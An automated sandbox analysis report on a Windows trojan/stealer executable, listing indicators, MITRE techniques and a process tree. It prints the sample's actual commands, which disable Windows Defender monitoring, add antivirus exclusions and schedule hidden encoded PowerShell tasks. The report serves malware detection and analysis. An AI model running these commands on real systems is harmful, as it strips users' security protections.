2e56d01448b731adb1b35fc72228af0efa4f10c254e03d914113702e6b2bdfd5

Analysis

max time kernel
112s
max time network
97s
platform
windows7_x64
resource
win7-20230220-en
resource tags

arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system
submitted
19-04-2023 18:34

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

file.exe
Size

7.2MB
MD5

9b2f88d0b9d260fdfbf606f19577308e
SHA1

d90da845541355034efc4480a5d97a211a03a745
SHA256

2e56d01448b731adb1b35fc72228af0efa4f10c254e03d914113702e6b2bdfd5
SHA512

bab68e67dfd309b94d744bcdb21968fb1810b942ab5cc131a1a61a3f6fd99e357cc28d17dc878ec6d9b57ae4b53708c40ac7e08c2a73393bc069609190eabe9b
SSDEEP

196608:91OLashz3FJ5/UI3hOxCHG7qn3+CYierPRURuWkcyvFYP:3OJhzVJNb393+5i8ZURuWPy+

Score

10^/10

evasion spyware stealer trojan

Malware Config

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs

evasion trojan

Modify Registry

T1112

Modify Existing Service

T1031

Disabling Security Tools

T1089

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1"	reg.exe

Windows security bypass 2 TTPs 40 IoCs

evasion trojan

Disabling Security Tools

T1089

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\scRiQJwYnZurGYzcC = "0"	conhost.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	conhost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\gQwnIvOSfgVlPwgt = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	schtasks.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\xbGBeBqdnfmWSnEyoVR = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\scRiQJwYnZurGYzcC = "0"	conhost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\gQwnIvOSfgVlPwgt = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\MySKhCIAjPpVC = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\PSrMLwgNU = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	conhost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\gQwnIvOSfgVlPwgt = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\HqWclUkqRTUn = "0"	schtasks.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\uzjGIbOFKwqU2 = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\HqWclUkqRTUn = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\MySKhCIAjPpVC = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\xbGBeBqdnfmWSnEyoVR = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\TePbsdUgyxbrNIVB = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\gQwnIvOSfgVlPwgt = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\PSrMLwgNU = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\uzjGIbOFKwqU2 = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\TePbsdUgyxbrNIVB = "0"	reg.exe

Checks BIOS information in registry 2 TTPs 1 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Install.exe

Executes dropped EXE 4 IoCs

pid	Process
1356	Install.exe
780	Install.exe
484	IPKeTJc.exe
1416	OTVgAce.exe

Loads dropped DLL 8 IoCs

pid	Process
1488	file.exe
1356	Install.exe
1356	Install.exe
1356	Install.exe
1356	Install.exe
780	Install.exe
780	Install.exe
780	Install.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Drops file in System32 directory 8 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	IPKeTJc.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File created	C:\Windows\system32\GroupPolicy\gpt.ini	Install.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File created	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	IPKeTJc.exe
File opened for modification	C:\Windows\system32\GroupPolicy\gpt.ini	IPKeTJc.exe

Drops file in Program Files directory 1 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\PSrMLwgNU\pmfJsF.dll	OTVgAce.exe

Drops file in Windows directory 3 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\pBhpQhEndrCBLmKcV.job	schtasks.exe
File created	C:\Windows\Tasks\KlOugEwrPWYFNkY.job	schtasks.exe
File created	C:\Windows\Tasks\bXdYnizyUUWLarOGTm.job	schtasks.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 7 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
1600	schtasks.exe
900	schtasks.exe
1724	schtasks.exe
1748	schtasks.exe
1844	schtasks.exe
1632	schtasks.exe
1888	schtasks.exe

Enumerates system info in registry 2 TTPs 2 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Install.exe

Modifies data under HKEY_USERS 8 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	wscript.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	wscript.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host\Settings	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	wscript.exe

Suspicious behavior: EnumeratesProcesses 20 IoCs

pid	Process
1904	powershell.EXE
1904	powershell.EXE
1904	powershell.EXE
952	powershell.EXE
952	powershell.EXE
952	powershell.EXE
1352	powershell.EXE
1352	powershell.EXE
1352	powershell.EXE
1628	powershell.EXE
1628	powershell.EXE
1628	powershell.EXE
1416	OTVgAce.exe
1416	OTVgAce.exe
1416	OTVgAce.exe
1416	OTVgAce.exe
1416	OTVgAce.exe
1416	OTVgAce.exe
1416	OTVgAce.exe
1416	OTVgAce.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	1904	powershell.EXE
Token: SeDebugPrivilege	952	powershell.EXE
Token: SeDebugPrivilege	1352	powershell.EXE
Token: SeDebugPrivilege	1628	powershell.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1488 wrote to memory of 1356	1488	file.exe	27
PID 1488 wrote to memory of 1356	1488	file.exe	27
PID 1488 wrote to memory of 1356	1488	file.exe	27
PID 1488 wrote to memory of 1356	1488	file.exe	27
PID 1488 wrote to memory of 1356	1488	file.exe	27
PID 1488 wrote to memory of 1356	1488	file.exe	27
PID 1488 wrote to memory of 1356	1488	file.exe	27
PID 1356 wrote to memory of 780	1356	Install.exe	28
PID 1356 wrote to memory of 780	1356	Install.exe	28
PID 1356 wrote to memory of 780	1356	Install.exe	28
PID 1356 wrote to memory of 780	1356	Install.exe	28
PID 1356 wrote to memory of 780	1356	Install.exe	28
PID 1356 wrote to memory of 780	1356	Install.exe	28
PID 1356 wrote to memory of 780	1356	Install.exe	28
PID 780 wrote to memory of 884	780	Install.exe	30
PID 780 wrote to memory of 884	780	Install.exe	30
PID 780 wrote to memory of 884	780	Install.exe	30
PID 780 wrote to memory of 884	780	Install.exe	30
PID 780 wrote to memory of 884	780	Install.exe	30
PID 780 wrote to memory of 884	780	Install.exe	30
PID 780 wrote to memory of 884	780	Install.exe	30
PID 780 wrote to memory of 1808	780	Install.exe	32
PID 780 wrote to memory of 1808	780	Install.exe	32
PID 780 wrote to memory of 1808	780	Install.exe	32
PID 780 wrote to memory of 1808	780	Install.exe	32
PID 780 wrote to memory of 1808	780	Install.exe	32
PID 780 wrote to memory of 1808	780	Install.exe	32
PID 780 wrote to memory of 1808	780	Install.exe	32
PID 884 wrote to memory of 1344	884	forfiles.exe	34
PID 884 wrote to memory of 1344	884	forfiles.exe	34
PID 884 wrote to memory of 1344	884	forfiles.exe	34
PID 884 wrote to memory of 1344	884	forfiles.exe	34
PID 884 wrote to memory of 1344	884	forfiles.exe	34
PID 884 wrote to memory of 1344	884	forfiles.exe	34
PID 884 wrote to memory of 1344	884	forfiles.exe	34
PID 1808 wrote to memory of 832	1808	forfiles.exe	35
PID 1808 wrote to memory of 832	1808	forfiles.exe	35
PID 1808 wrote to memory of 832	1808	forfiles.exe	35
PID 1808 wrote to memory of 832	1808	forfiles.exe	35
PID 1808 wrote to memory of 832	1808	forfiles.exe	35
PID 1808 wrote to memory of 832	1808	forfiles.exe	35
PID 1808 wrote to memory of 832	1808	forfiles.exe	35
PID 1344 wrote to memory of 1528	1344	cmd.exe	36
PID 1344 wrote to memory of 1528	1344	cmd.exe	36
PID 1344 wrote to memory of 1528	1344	cmd.exe	36
PID 1344 wrote to memory of 1528	1344	cmd.exe	36
PID 1344 wrote to memory of 1528	1344	cmd.exe	36
PID 1344 wrote to memory of 1528	1344	cmd.exe	36
PID 1344 wrote to memory of 1528	1344	cmd.exe	36
PID 832 wrote to memory of 1640	832	cmd.exe	37
PID 832 wrote to memory of 1640	832	cmd.exe	37
PID 832 wrote to memory of 1640	832	cmd.exe	37
PID 832 wrote to memory of 1640	832	cmd.exe	37
PID 832 wrote to memory of 1640	832	cmd.exe	37
PID 832 wrote to memory of 1640	832	cmd.exe	37
PID 832 wrote to memory of 1640	832	cmd.exe	37
PID 832 wrote to memory of 952	832	cmd.exe	38
PID 832 wrote to memory of 952	832	cmd.exe	38
PID 832 wrote to memory of 952	832	cmd.exe	38
PID 832 wrote to memory of 952	832	cmd.exe	38
PID 832 wrote to memory of 952	832	cmd.exe	38
PID 832 wrote to memory of 952	832	cmd.exe	38
PID 832 wrote to memory of 952	832	cmd.exe	38
PID 1344 wrote to memory of 1308	1344	cmd.exe	39

C:\Users\Admin\AppData\Local\Temp\file.exe
"C:\Users\Admin\AppData\Local\Temp\file.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1488
- C:\Users\Admin\AppData\Local\Temp\7zS33AF.tmp\Install.exe
  .\Install.exe
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:1356
- - C:\Users\Admin\AppData\Local\Temp\7zS3785.tmp\Install.exe
    .\Install.exe /S /site_id "525403"
    3⤵
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Loads dropped DLL
    - Drops file in System32 directory
    - Enumerates system info in registry
    - Suspicious use of WriteProcessMemory
    PID:780
  - - C:\Windows\SysWOW64\forfiles.exe
      "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:884
    - - C:\Windows\SysWOW64\cmd.exe
        
        /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:1344
      - \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
        6⤵
        
        PID:1528
      - \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
        6⤵
        
        PID:1308
  - - C:\Windows\SysWOW64\forfiles.exe
      "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1808
    - - C:\Windows\SysWOW64\cmd.exe
        
        /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:832
      - \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
        6⤵
        
        PID:1640
      - \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
        6⤵
        
        PID:952
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /CREATE /TN "gnASyuJhy" /SC once /ST 12:39:32 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
      4⤵
      Creates scheduled task(s)
      PID:1844
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /run /I /tn "gnASyuJhy"
      4⤵
      PID:564
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /DELETE /F /TN "gnASyuJhy"
      4⤵
      PID:1172
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /CREATE /TN "bXdYnizyUUWLarOGTm" /SC once /ST 20:35:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\scRiQJwYnZurGYzcC\ZrLmggqzYyKemQH\IPKeTJc.exe\" en /site_id 525403 /S" /V1 /F
      4⤵
      Drops file in Windows directory
      Creates scheduled task(s)
      PID:1632

C:\Windows\system32\taskeng.exe
taskeng.exe {0A3A62BC-947A-421C-B72A-A75EBCF8730F} S-1-5-21-3948302646-268491222-1934009652-1000:KXZDHPUW\Admin:Interactive:[1]
1⤵
PID:784
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
  2⤵
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1904
- - C:\Windows\system32\gpupdate.exe
    "C:\Windows\system32\gpupdate.exe" /force
    3⤵
    PID:1140
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
  2⤵
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:952
- - C:\Windows\system32\gpupdate.exe
    "C:\Windows\system32\gpupdate.exe" /force
    3⤵
    PID:708
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
  2⤵
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1352
- - C:\Windows\system32\gpupdate.exe
    "C:\Windows\system32\gpupdate.exe" /force
    3⤵
    PID:1884
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
  2⤵
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1628
- - C:\Windows\system32\gpupdate.exe
    "C:\Windows\system32\gpupdate.exe" /force
    3⤵
    PID:580

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:1136

C:\Windows\system32\taskeng.exe
taskeng.exe {91CFCACD-CA20-4248-9A72-D18F6779387D} S-1-5-18:NT AUTHORITY\System:Service:
1⤵
PID:928
- C:\Users\Admin\AppData\Local\Temp\scRiQJwYnZurGYzcC\ZrLmggqzYyKemQH\IPKeTJc.exe
  C:\Users\Admin\AppData\Local\Temp\scRiQJwYnZurGYzcC\ZrLmggqzYyKemQH\IPKeTJc.exe en /site_id 525403 /S
  2⤵
  - Executes dropped EXE
  - Drops file in System32 directory
  PID:484
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "gCalvhNoL" /SC once /ST 13:00:14 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
    3⤵
    - Creates scheduled task(s)
    PID:1888
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /run /I /tn "gCalvhNoL"
    3⤵
    PID:876
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "gCalvhNoL"
    3⤵
    PID:1224
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
    3⤵
    PID:1548
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
      4⤵
      Modifies Windows Defender Real-time Protection settings
      PID:1916
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
    3⤵
    PID:1572
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
      4⤵
      Modifies Windows Defender Real-time Protection settings
      PID:432
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "gvksnJNkl" /SC once /ST 18:20:28 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
    3⤵
    - Creates scheduled task(s)
    PID:1600
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /run /I /tn "gvksnJNkl"
    3⤵
    PID:996
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "gvksnJNkl"
    3⤵
    PID:612
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\gQwnIvOSfgVlPwgt" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:844
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\gQwnIvOSfgVlPwgt" /t REG_DWORD /d 0 /reg:32
      4⤵
      Windows security bypass
      PID:888
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\gQwnIvOSfgVlPwgt" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:1216
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\gQwnIvOSfgVlPwgt" /t REG_DWORD /d 0 /reg:64
      4⤵
      Windows security bypass
      PID:1108
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\gQwnIvOSfgVlPwgt" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:1768
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\gQwnIvOSfgVlPwgt" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:916
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\gQwnIvOSfgVlPwgt" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:568
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\gQwnIvOSfgVlPwgt" /t REG_DWORD /d 0 /reg:64
      4⤵
      PID:1416
- - C:\Windows\SysWOW64\cmd.exe
    cmd /C copy nul "C:\Windows\Temp\gQwnIvOSfgVlPwgt\LsKuVZpV\yPcVUSemiNtNlCOC.wsf"
    3⤵
    PID:1212
- - C:\Windows\SysWOW64\wscript.exe
    wscript "C:\Windows\Temp\gQwnIvOSfgVlPwgt\LsKuVZpV\yPcVUSemiNtNlCOC.wsf"
    3⤵
    - Modifies data under HKEY_USERS
    PID:432
  - - C:\Windows\SysWOW64\reg.exe
